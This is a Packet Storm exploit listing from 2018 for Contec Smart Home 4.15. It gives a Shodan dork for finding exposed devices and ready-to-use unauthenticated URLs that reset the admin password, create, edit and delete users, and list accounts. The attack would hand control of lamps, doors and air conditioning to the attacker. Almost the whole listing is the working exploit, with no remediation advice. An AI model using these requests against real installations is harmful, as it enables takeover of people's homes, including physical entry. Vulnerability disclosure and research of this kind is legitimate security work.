Contec Smart Home 4.15 Insecure Direct Object Reference

2018-03-16T00:00:00
ID PACKETSTORM:146824
Type packetstorm
Reporter Z3ro0ne
Modified 2018-03-16T00:00:00

Description

                                        
                                            `# Title : Contec smart home 4.15 Unauthorized Password Reset  
# Shodan Dork : "content/smarthome.php"  
# Vendor Homepage : http://contec.co.il  
# Tested on : Google Chrome  
# Tested version : 4.15  
# Date : 2018-03-14  
# Author : Z3ro0ne  
# Contact : saadousfar59@gmail.com  
# Facebook Page : https://www.facebook.com/Z3ro0ne  
  
# Vulnerability description :  
the Vulnerability allow unauthenticated attacker to remotely bypass authentication and change admin password without old password and control (lamps,doors,air conditioner...)  
  
  
# Exploit   
  
To Reset Admin password   
http://Ipaddress:port/content/new_user.php?user_name=ADMIN&password=NEWPASSWORD&group_id=1  
  
To Create a new user  
http://Ipaddress:port/content/new_user.php?user_name=NEWUSER&password=NEWPASSWORD&group_id=1  
  
To edit a user  
http://Ipaddress:port/content/edit_user.php?user_name=USER&password=NEWPASSWORD&group_id=1  
  
To Delete a user   
http://Ipaddress:port/content/delete_user.php?user_name=USER  
  
Users list   
http://Ipaddress:port/content/user.php  
  
`